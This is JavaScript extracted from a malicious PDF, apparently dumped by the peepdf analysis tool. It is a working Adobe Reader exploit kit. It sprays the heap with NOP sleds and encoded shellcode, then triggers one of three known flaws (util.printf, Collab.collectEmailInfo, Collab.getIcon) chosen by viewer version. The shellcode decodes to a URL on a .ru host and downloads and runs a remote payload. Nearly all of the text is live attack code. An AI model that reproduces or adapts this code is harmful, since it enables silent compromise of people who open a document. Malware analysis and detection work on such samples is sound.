// peepdf comment: Javascript code located in object 1 (version 0)

this.I1L()

// peepdf comment: Javascript code located in object 13 (version 0)

var i74x = new Array();

function h70d(k28m, r22r) {
    while (k28m.length * 2 < r22r) {
        k28m += k28m;
    }
    k28m = k28m.substring(0, r22r / 2);
    return k28m;
}

function p5f(a53b) {
    var x1y = 0x0c0c0c0c;
    var p90l = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u6E69%u6F73%u7466%u7265%u722E%u2F75%u6F6C%u6461%u6C2F%u616F%u2E64%u6870%u3F70%u7473%u7461%u573D%u6E69%u6F64%u7377%u6C2F%u616F%u2E64%u6870%u2670%u3D73%u0031");
    if (a53b == 1) {
        x1y = 0x30303030;
        p90l = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u6E69%u6F73%u7466%u7265%u722E%u2F75%u6F6C%u6461%u6C2F%u616F%u2E64%u6870%u3F70%u7473%u7461%u573D%u6E69%u6F64%u7377%u6C2F%u616F%u2E64%u6870%u2670%u3D73%u0032");
    }
    if (a53b == 2) {
        p90l = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u772F%u6E69%u6F73%u7466%u7265%u722E%u2F75%u6F6C%u6461%u6C2F%u616F%u2E64%u6870%u3F70%u7473%u7461%u573D%u6E69%u6F64%u7377%u6C2F%u616F%u2E64%u6870%u2670%u3D73%u0033");
    }
    var r34u = 0x400000;
    var k47z = p90l.length * 2;
    var r22r = r34u - (k47z + 0x38);
    var k28m = unescape("%u9090%u9090");
    k28m = h70d(k28m, r22r);
    var j83s = (x1y - 0x400000) / r34u;
    for (var h16k = 0; h16k < j83s; h16k++) {
        i74x[h16k] = k28m + p90l;
    }
}

function k60r() {
    var y28y = app.viewerVersion.toString();
    if (y28y > 8) {
        p5f(1);
        var p91z = "12999999999999999999";
        for (v94m = 0; v94m < 276; v94m++) {
            p91z += "8";
        }
        util.printf("%45000f", p91z);
    }
    if (y28y < 8) {
        p5f(0);
        var x83m = unescape("%u0c0c%u0c0c");
        while (x83m.length < 44952) x83m += x83m;
        this.collabStore = Collab.collectEmailInfo({
            subj: "",
            msg: x83m
        });
    }
    if (y28y < 9.1) {
        if (app.doc.Collab.getIcon) {
            p5f(2);
            var v46k = unescape("%09");
            while (v46k.length < 0x4000) v46k += v46k;
            v46k = "N." + v46k;
            app.doc.Collab.getIcon(v46k);
        }
    }
}
k60r();

